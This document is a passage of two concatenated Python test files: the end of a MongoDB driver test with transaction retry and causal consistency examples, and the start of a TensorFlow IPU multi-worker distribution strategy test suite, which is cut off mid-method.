print("TransientTransactionError, retrying"
"transaction ...")
continue
else:
raise
# End Transactions Retry Example 1
with client.start_session() as session:
run_transaction_with_retry(update_employee_info, session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 2
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Retry Example 2
# Test commit_with_retry from the previous examples
def _insert_employee_retry_commit(session):
with session.start_transaction():
employees.insert_one(
{"employee": 4, "status": "Active"},
session=session)
events.insert_one(
{"employee": 4, "status": {"new": "Active", "old": None}},
session=session)
commit_with_retry(session)
with client.start_session() as session:
run_transaction_with_retry(_insert_employee_retry_commit, session)
employee = employees.find_one({"employee": 4})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Active')
# Start Transactions Retry Example 3
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying "
"transaction ...")
continue
else:
raise
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# Updates two collections in a transactions
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority"),
read_preference=ReadPreference.PRIMARY):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
commit_with_retry(session)
# Start a session.
with client.start_session() as session:
try:
run_transaction_with_retry(update_employee_info, session)
except Exception as exc:
# Do something with error.
raise
# End Transactions Retry Example 3
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
@client_context.require_transactions
def test_transactions_beta(self):
# Transaction beta examples
client = self.client
self.addCleanup(client.drop_database, "test")
db = client.test
shipment = db.create_collection("shipment")
inventory = db.create_collection("inventory")
inventory.insert_one({"sku": "abc123", "qty": 500})
# Start Beta Transaction Example 1
db = client.test
with client.start_session() as s:
with s.start_transaction():
db.inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
db.shipment.insert_one({'sku': 'abc123', 'qty': 100},
session=s)
# End Beta Transaction Example 1
# Beta Transaction Example 1 with explicit start, commit, and abort.
with client.start_session() as s:
s.start_transaction()
try:
db.inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
db.shipment.insert_one({'sku': 'abc123', 'qty': 100},
session=s)
except Exception:
s.abort_transaction()
raise
s.commit_transaction()
# Start Beta Transaction Example 2
db = client.test
shipment = db.get_collection('shipment',
write_concern=WriteConcern(w='majority'))
# In the following block, the following write concerns are used:
# the update_one and insert_one operations uses w = 1,
# the transaction commit/abort uses w = 'majority'.
with client.start_session() as s:
with s.start_transaction(write_concern=WriteConcern(w='majority')):
inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
shipment.insert_one({'sku': 'abc123', 'qty': 100}, session=s)
# End Beta Transaction Example 2
# Start Beta Transaction Example 3
def run_transaction(session, txn_callback):
with session.start_transaction():
txn_callback(session)
def run_transaction_with_retry(session, txn_callback):
try:
run_transaction(session, txn_callback)
except (OperationFailure, ConnectionFailure) as exc:
if exc.has_error_label("TransientTransactionError"):
# Retry the entire transaction on temporary transaction
# failures.
run_transaction(session, txn_callback)
else:
raise
def shipment_transaction(session):
inventory.update_one({'sku': 'abc123'}, {'$inc': {'qty': -100}},
session=session)
shipment.insert_one({'sku': 'abc123', 'qty': 100}, session=session)
with client.start_session() as session:
run_transaction_with_retry(session, shipment_transaction)
# End Beta Transaction Example 3
class TestCausalConsistencyExamples(IntegrationTest):
@client_context.require_version_min(3, 6, 0)
@client_context.require_secondaries_count(1)
@client_context.require_no_mmap
def test_causal_consistency(self):
# Causal consistency examples
client = self.client
self.addCleanup(client.drop_database, 'test')
client.test.drop_collection('items')
client.test.items.insert_one({
'sku': "111", 'name': 'Peanuts',
'start':datetime.datetime.today()})
# Start Causal Consistency Example 1
with client.start_session(causal_consistency=True) as s1:
current_date = datetime.datetime.today()
items = client.get_database(
'test', read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
items.update_one(
{'sku': "111", 'end': None},
{'$set': {'end': current_date}}, session=s1)
items.insert_one(
{'sku': "nuts-111", 'name': "Pecans",
'start': current_date}, session=s1)
# End Causal Consistency Example 1
# Start Causal Consistency Example 2
with client.start_session(causal_consistency=True) as s2:
s2.advance_cluster_time(s1.cluster_time)
s2.advance_operation_time(s1.operation_time)
items = client.get_database(
'test', read_preference=ReadPreference.SECONDARY,
read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
for item in items.find({'end': None}, session=s2):
print(item)
# End Causal Consistency Example 2
if __name__ == "__main__":
unittest.main()
|
ipu_multi_worker_strategy_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import collections
import glob
import json
import multiprocessing
import os
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.compat.v1 import disable_v2_behavior
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import keras
from tensorflow.python.client import session as session_lib
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute.cluster_resolver.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.cluster_resolver.tfconfig_cluster_resolver import TFConfigClusterResolver
from tensorflow.python.distribute.reduce_util import ReduceOp
from tensorflow.python.estimator import estimator_lib
from tensorflow.python.framework import ops
from tensorflow.python.ipu import ipu_compiler
from tensorflow.python.ipu import ipu_estimator
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import ipu_pipeline_estimator
from tensorflow.python.ipu import ipu_run_config
from tensorflow.python.ipu import loops
from tensorflow.python.ipu import scopes
from tensorflow.python.ipu import utils as ipu_utils
from tensorflow.python.ipu.config import IPUConfig
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUMirroredVariable
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUMultiWorkerStrategyV1
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUSyncOnReadVariable
from tensorflow.python.ipu.ops import pipelining_ops
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.keras.layers.normalization import BatchNormalization
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import server_lib
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
disable_v2_behavior()
class IPUMultiWorkerStrategyV1Test(multi_worker_test_base.MultiWorkerTestBase):
"""Tests using multiple threads in the same processes."""
@classmethod
def setUpClass(cls):
cfg = IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
cls._num_workers = 2
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=cls._num_workers, num_ps=0, has_chief=False)
def setUp(self):
# We use a different key_base for each test so that collective keys won't be
# reused.
IPUMultiWorkerStrategyV1._collective_key_base += 100000
super().setUp()
def _create_test_objects(self, task_type, task_id, variables_on_host=True):
sess_config = config_pb2.ConfigProto()
sess_config.allow_soft_placement = False
sess_config.log_device_placement = False
cluster_spec = multi_worker_util.normalize_cluster_spec(self._cluster_spec)
cluster_resolver = SimpleClusterResolver(cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id)
target = cluster_resolver.master(task_id=task_id,
task_type=task_type,
rpc_layer="grpc")
strategy = IPUMultiWorkerStrategyV1(cluster_resolver,
variables_on_host=variables_on_host)
sess_config = strategy.update_config_proto(sess_config)
return strategy, target, sess_config
def _get_devices(self, task_type, task_id):
cpu_device = "/job:{}/replica:0/task:{}/device:CPU:0".format(
task_type, task_id)
ipu_device = "/job:{}/replica:0/task:{}/device:IPU:0".format(
task_type, task_id)
return cpu_device, ipu_device
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_strategy_first_worker(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=0)
self.assertEqual(2, strategy.num_replicas_in_sync)
self.assertEqual(True, strategy.extended.experimental_between_graph)
self.assertEqual(True, strategy.extended.experimental_should_init)
self.assertEqual(True, strategy.extended.should_checkpoint)
self.assertEqual(True, strategy.extended.should_save_summary)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_strategy_second_worker(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=1)
self.assertEqual(2, strategy.num_replicas_in_sync)
self.assertEqual(True, strategy.extended.experimental_between_graph)
self.assertEqual(True, strategy.extended.experimental_should_init)
self.assertEqual(False, strategy.extended.should_checkpoint)
self.assertEqual(False, strategy.extended.should_save_summary)
def test_initializer_colocation(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=0)
with strategy.scope():
v = variables.Variable(1.0)
assign_op = v.initializer.control_inputs[0]
# The first input is the variable, the second is the value.
initial_value_op = assign_op.inputs[1].op
# The initial value should be colocated with the CPU.
self.assertEqual(initial_value_op.colocation_groups(), [b'loc:@cpu'])
def _test_variables_on_host(self, task_type, task_id, _num_gpus):
strategy, _, _ = self._create_test_objects(task_type,
task_id,
variables_on_host=True)
cpu_device, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
v = variables.Variable(1.0)
self.assertEqual(cpu_device, v.device)
def per_replica_fn():
w = variable_scope.get_variable(name="w", initializer=0.0)
self.assertEqual(cpu_device, w.device)
op = math_ops.abs(w)
self.assertEqual(ipu_device, op.device)
return op
per_replica_op = strategy.run(per_replica_fn)
self.assertEqual(ipu_device, per_replica_op.device)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_variables_on_host(self):
self._run_between_graph_clients(self._test_variables_on_host,
self._cluster_spec,
num_gpus=0)
def _test_variables_on_ipu(self, task_type, task_id, _num_gpus):
strategy, _, _ = self._create_test_objects(task_type,
task_id,
variables_on_host=False)
_, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
v = variables.Variable(1.0)
self.assertEqual(ipu_device, v.device)
def per_replica_fn():
w = variable_scope.get_variable(name="w", initializer=0.0)
self.assertEqual(ipu_device, w.device)
op = math_ops.abs(w)
self.assertEqual(ipu_device, op.device)
return op
per_replica_op = strategy.run(per_replica_fn)
self.assertEqual(ipu_device, per_replica_op.device)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_variables_on_ipu(self):
self._run_between_graph_clients(self._test_variables_on_ipu,
self._cluster_spec,
num_gpus=0)
def _test_all_reduce(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
y = x * x
self.assertEqual(compute_device, y.device)
return y
inputs = array_ops.placeholder(dtype=np.float32, shape=())
per_replica_y = strategy.run(per_replica_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_y.device)
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
self.assertEqual(variable_device, sum_y.device)
with session_lib.Session(target=target, config=sess_config) as sess:
out = sess.run(sum_y, feed_dict={inputs: task_id + 1})
self.assertEqual(5.0, out) # 1*1 + 2*2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_all_reduce(self):
self._run_between_graph_clients(self._test_all_reduce,
self._cluster_spec,
num_gpus=0)
def _test_mirrored_variable(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn():
with ops.device("/device:IPU:0"):
w0 = variable_scope.get_variable(name="w0", initializer=task_id + 1)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(variable_device, w0.device)
cached_value = w0.value()
self.assertEqual(compute_device, cached_value.device)
ret = w0 * w0
self.assertEqual(compute_device, ret.device)
return ret
per_replica_ret = strategy.run(per_replica_fn, args=[])
self.assertEqual(compute_device, per_replica_ret.device)
sum_ret = strategy.reduce(ReduceOp.SUM, per_replica_ret, axis=None)
self.assertEqual(variable_device, sum_ret.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# Both should have initial value from first worker
self.assertEqual([1.0], sess.run(variables.global_variables()))
self.assertEqual(2.0, sess.run(sum_ret)) # 1*1 + 1*1
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_mirrored_variable(self):
self._run_between_graph_clients(self._test_mirrored_variable,
self._cluster_spec,
num_gpus=0)
def _test_sync_on_read_variable(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
w0 = variable_scope.get_variable(
name="w0",
initializer=float(task_id + 1),
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertIsInstance(w0, IPUSyncOnReadVariable)
self.assertEqual(compute_device, w0.device)
initializer_tensor = w0.values[0].initializer.inputs[1]
self.assertEqual(variable_device, initializer_tensor.device)
return w0.assign_add(x)
inputs = array_ops.placeholder(dtype=np.float32, shape=())
assign_add_op = strategy.run(per_replica_fn, args=[inputs])
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# Both should have initial value from first worker
self.assertEqual([1.0], sess.run(variables.global_variables()))
sess.run(assign_add_op, feed_dict={inputs: task_id + 1})
# mean(1 + 1, 1 + 2) = 2.5
self.assertEqual([2.5], sess.run(variables.global_variables()))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_sync_on_read_variable(self):
self._run_between_graph_clients(self._test_sync_on_read_variable,
self._cluster_spec,
num_gpus=0)
def _test_train_split_device_host_fn(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
learning_rate = 0.5
initial_w = 2.0
optimizer = GradientDescentOptimizer(learning_rate)
def device_step_fn(x):
w = variable_scope.get_variable(name="w", initializer=initial_w)
self.assertEqual(variable_device, w.device)
self.assertEqual(compute_device, w.value().device)
loss = w * x
self.assertEqual(compute_device, loss.device)
with ops.name_scope("compute_gradients"):
grads_and_vars = optimizer.compute_gradients(loss)
grads = [g for (g, _) in grads_and_vars]
return grads, loss
def compiled_device_step_fn(inputs):
with ipu_scope("/device:IPU:0"):
grads, loss = ipu_compiler.compile(device_step_fn, inputs=[inputs])
return grads, loss
def host_step_fn(grads):
with ops.name_scope("apply_gradients"):
grads_and_vars = zip(grads, variables.global_variables())
train_op = optimizer.apply_gradients(grads_and_vars)
self.assertEqual(variable_device, train_op.device)
return train_op
def step_fn(inputs):
grads, loss = compiled_device_step_fn(inputs)
with ops.device("/device:CPU:0"):
train_op = host_step_fn(grads)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_loss.device)
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
self.assertEqual(variable_device, total_loss.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# L(x) = num_replicas * w * x
# dL(x)/dw = num_replicas * x
# w := w - learning_rate * num_replicas * x
num_replicas = strategy.num_replicas_in_sync
reference_w = initial_w
w_tensor = variables.global_variables()[0]
for x in range(10):
self.assertEqual(reference_w, sess.run(w_tensor))
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: x})
self.assertEqual(num_replicas * reference_w * x, loss_val)
reference_w -= learning_rate * num_replicas * x
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_train_split_device_host_fn(self):
self._run_between_graph_clients(self._test_train_split_device_host_fn,
self._cluster_spec,
num_gpus=0)
def _test_train_combined_device_host_fn(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
learning_rate = 0.5
initial_w = 2.0
optimizer = GradientDescentOptimizer(learning_rate)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=initial_w)
self.assertEqual(variable_device, w.device)
self.assertEqual(compute_device, w.value().device)
loss = w * x
self.assertEqual(compute_device, loss.device)
# optimizer.apply_gradients() is colocated with the variables even
# in ipu_scope, while optimizer.compute_gradients() is not.
train_op = optimizer.minimize(loss)
self.assertEqual(variable_device, train_op.device)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_loss.device)
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
self.assertEqual(variable_device, total_loss.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# L(x) = num_replicas * w * x
# dL(x)/dw = num_replicas * x
# w := w - learning_rate * num_replicas * x
num_replicas = strategy.num_replicas_in_sync
reference_w = initial_w
w_tensor = variables.global_variables()[0]
for x in range(10):
self.assertEqual(reference_w, sess.run(w_tensor))
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: x})
self.assertEqual(num_replicas * reference_w * x, loss_val)
reference_w -= learning_rate * num_replicas * x
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_train_combined_device_host_fn(self):
self._run_between_graph_clients(self._test_train_combined_device_host_fn,
self._cluster_spec,
num_gpus=0)
def _test_slot_variable_on_host(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, _ = self._get_devices(task_type, task_id)
with strategy.scope():
optimizer = MomentumOptimizer(learning_rate=0.5, momentum=0.9)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=1.0)
loss = w * x
train_op = optimizer.minimize(loss)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
# Verify device placement of momentum accumulator variable.
self.assertEqual(1, len(optimizer.variables()))
self.assertEqual(variable_device, optimizer.variables()[0].device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: 1.0})
self.assertEqual(2.0, loss_val)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_slot_variable_on_host(self):
self._run_between_graph_clients(self._test_slot_variable_on_host,
self._cluster_spec,
num_gpus=0)
def _test_slot_variable_on_ipu(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id, variables_on_host=False)
_, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
optimizer = MomentumOptimizer(learning_rate=0.5, momentum=0.9)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=1.0)
loss = w * x
train_op = optimizer.minimize(loss)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
# Verify device placement of momentum accumulator variable.
self.assertEqual(1, len(optimizer.variables()))
self.assertEqual(ipu_device, optimizer.variables()[0].device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: 1.0})
self.assertEqual(2.0, loss_val)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_slot_variable_on_ipu(self):
self._run_between_graph_clients(self._test_slot_variable_on_ipu,
self._cluster_spec,
num_gpus=0)
def _test_distribute_dataset(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
with strategy.scope():
def step_fn(x):
with ipu_scope("/device:IPU:0"):
y = x.values[0] * x.values[0]
return y
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.map(lambda x: math_ops.cast(x, np.float32))
dataset = dataset.batch(2, drop_remainder=True) # global batch size
dist_dataset = strategy.experimental_distribute_dataset(dataset)
inputs = dist_dataset.make_initializable_iterator()
per_replica_y = strategy.run(step_fn, args=[next(inputs)])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(inputs.initializer)
self.assertEqual(1.0, sess.run(sum_y)) # 0*0 + 1*1
self.assertEqual(13.0, sess.run(sum_y)) # 2*2 + 3*3
self.assertEqual(41.0, sess.run(sum_y)) # 4*4 + 5*5
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_distribute_dataset(self):
self._run_between_graph_clients(self._test_distribute_dataset,
self._cluster_spec,
num_gpus=0)
def _test_monitored_training_session(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
with strategy.scope():
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable("w", initializer=2.0)
y = w * x
return y
inputs = array_ops.placeholder(dtype=np.float32, shape=())
per_replica_y = strategy.run(step_fn, args=[inputs])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
with MonitoredTrainingSession(master=target, config=sess_config) as sess:
out = sess.run(sum_y, feed_dict={inputs: task_id + 1})
self.assertEqual(6.0, out) # 2*1 + 2*2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_monitored_training_session(self):
self._run_between_graph_clients(self._test_monitored_training_session,
self._cluster_spec,
num_gpus=0)
def _test_ipu_estimator_train_with_host_call(self, task_type, task_id,
_num_gpus):
strategy, target, _ = self._create_test_objects(task_type=task_type,
task_id=task_id)
learning_rate = 0.5
initial_w = 2.0
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
optimizer = MomentumOptimizer(learning_rate=learning_rate, momentum=0.0)
def host_model_fn(*grads):
grads_and_vars = zip(grads, variables.trainable_variables())
with ops.name_scope("apply_gradients"):
train_op = optimizer.apply_gradients(grads_and_vars)
return train_op
def my_model_fn(features, labels, mode):
w = variable_scope.get_variable(name="w", initializer=initial_w)
predictions = features * w
loss = losses.mean_squared_error(labels=labels, predictions=predictions)
# Note: According to some comments, this might be subject to change in TF2.
# Remember to update documentation and examples when this happens.
self.assertEqual(ReduceOp.MEAN, distribute_lib.get_loss_reduction())
with ops.name_scope("compute_gradients"):
grads_and_vars = optimizer.compute_gradients(loss)
grads = [g for (g, _) in grads_and_vars]
train_op = array_ops.identity(loss)
host_call = (host_model_fn, grads)
return ipu_estimator.IPUEstimatorSpec(mode=mode,
loss=loss,
train_op=train_op,
host_call=host_call)
features = np.array([[1.0], [2.0]], dtype=np.float32)
labels = np.array([[1.0], [2.0]], dtype=np.float32)
def my_input_fn(input_context):
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
dataset = dataset.batch(1, drop_remainder=True).repeat()
num_shards = input_context.num_input_pipelines
shard_index = input_context.input_pipeline_id
self.assertEqual(self._num_workers, num_shards)
self.assertEqual(task_id, shard_index)
dataset = dataset.shard(num_shards=num_shards, index=shard_index)
return dataset
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
master=target,
train_distribute=strategy,
)
estimator = ipu_estimator.IPUEstimator(model_fn=my_model_fn, config=config)
reference_w = initial_w
for i in range(3):
estimator.train(my_input_fn, steps=1)
self.assertEqual(i + 1, estimator.get_variable_value("global_step"))
# L(x, y) = 0.5 * ((w * x_0 - y_0)^2 + (w * x_1 - y_1)^2)
# dL(x, y)/dw = (w * x_0 - y_0) * x_0 + (w * x_1 - y_1) * x_1
reference_gradient = np.sum((reference_w * features - labels) * features)
reference_w -= learning_rate * reference_gradient
self.assertEqual(reference_w, estimator.get_variable_value("w"))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_ipu_estimator_train_with_host_call(self):
self._run_between_graph_clients(
self._test_ipu_estimator_train_with_host_call,
self._cluster_spec,
num_gpus=0)
def _test_batch_normalization(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id, variables_on_host=True)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
batch_norm = BatchNormalization(momentum=0.0)
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
y = batch_norm(x, training=True)
self.assertIsInstance(batch_norm.beta, IPUMirroredVariable)
self.assertIsInstance(batch_norm.gamma, IPUMirroredVariable)
self.assertEqual(variable_device, batch_norm.beta.device)
self.assertEqual(variable_device, batch_norm.gamma.device)
self.assertIsInstance(batch_norm.moving_mean, IPUSyncOnReadVariable)
self.assertIsInstance(batch_norm.moving_variance,
IPUSyncOnReadVariable)
self.assertEqual(compute_device, batch_norm.moving_mean.device)
self.assertEqual(compute_device, batch_norm.moving_variance.device)
return y
def compiled_per_replica_fn(inputs):
with ipu_scope("/device:IPU:0"):
[out] = ipu_compiler.compile(per_replica_fn, inputs=[inputs])
return out
inputs = array_ops.placeholder(dtype=np.float32, shape=(2, 1))
per_replica_y = strategy.run(compiled_per_replica_fn, args=[inputs])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
self.assertEqual(variable_device, batch_norm.moving_mean._get().device) # pylint: disable=protected-access
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
sess.run(sum_y, feed_dict={inputs: [[2.0 * (task_id + 1)], [0.0]]})
task_local_mean = batch_norm.moving_mean._get_on_device_or_primary() # pylint: disable=protected-access
self.assertAllEqual([task_id + 1], sess.run(task_local_mean))
# mean(mean(2, 0), mean(4, 0)) = mean(1, 3) = 1.5
global_mean = batch_norm.moving_mean
self.assertAllEqual([1.5], sess.run(global_mean))
# mean(var(2, 0), var(4, 0)) = mean(1, 4) = 2.5
self.assertAllEqual([2.5], sess.run(batch_norm.moving_variance))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_batch_normalization(self):
self._run_between_graph_clients(self._test_batch_normalization,
self._cluster_spec,
num_gpus=0)
def _get_executed_nodes_by_device(run_metadata):
nodes_by_device = collections.defaultdict(list)
for dev_stats in run_metadata.step_stats.dev_stats:
for node_stats in dev_stats.node_stats:
nodes_by_device[dev_stats.device].append(node_stats.node_name)
return nodes_by_device
def _get_summary_values(model_dir, tag):
event_files = glob.glob(model_dir + "/*tfevents*")
if len(event_files) != 1:
raise ValueError("Expected exactly one events file in {}, found {}".format(
model_dir, len(event_files)))
outputs = []
for e in summary_iterator.summary_iterator(event_files[0]):
for v in e.summary.value:
if v.tag == tag:
outputs.append(v.simple_value)
return outputs
class IPUMultiWorkerStrategyV1MultiProcessTest(googletest.TestCase):
"""Tests using multiple processes."""
def _run_task_in_process(self, task_fn, cluster_spec, task_type, task_id):
def wrapper_fn():
os.environ["TF_CONFIG"] = json.dumps({
"cluster": cluster_spec,
"rpc_layer": "grpc",
"task": {
"type": task_type,
"index": task_id
}
})
task_fn(task_id)
return multiprocessing.Process(target=wrapper_fn)
def _run_workers_in_processes(self, task_fn, cluster_spec):
task_type = "worker"
processes = []
for task_id in range(len(cluster_spec[task_type])):
p = self._run_task_in_process(task_fn, cluster_spec, task_type, task_id)
p.start()
processes.append(p)
# Join all the processes before asserting to avoid any orphans.
for p in processes:
p.join()
for p in processes:
self.assertEqual(0, p.exitcode)
def _create_test_objects(self, start_server=True, variables_on_host=True):
cluster_resolver = TFConfigClusterResolver()
strategy = IPUMultiWorkerStrategyV1(cluster_resolver,
variables_on_host=variables_on_host)
sess_config = config_pb2.ConfigProto()
sess_config.allow_soft_placement = False
sess_config.log_device_placement = False
# The line below sets `sess_config.experimental.collective_group_leader`
sess_config = strategy.update_config_proto(sess_config)
if start_server:
server = server_lib.Server(cluster_resolver.cluster_spec(),
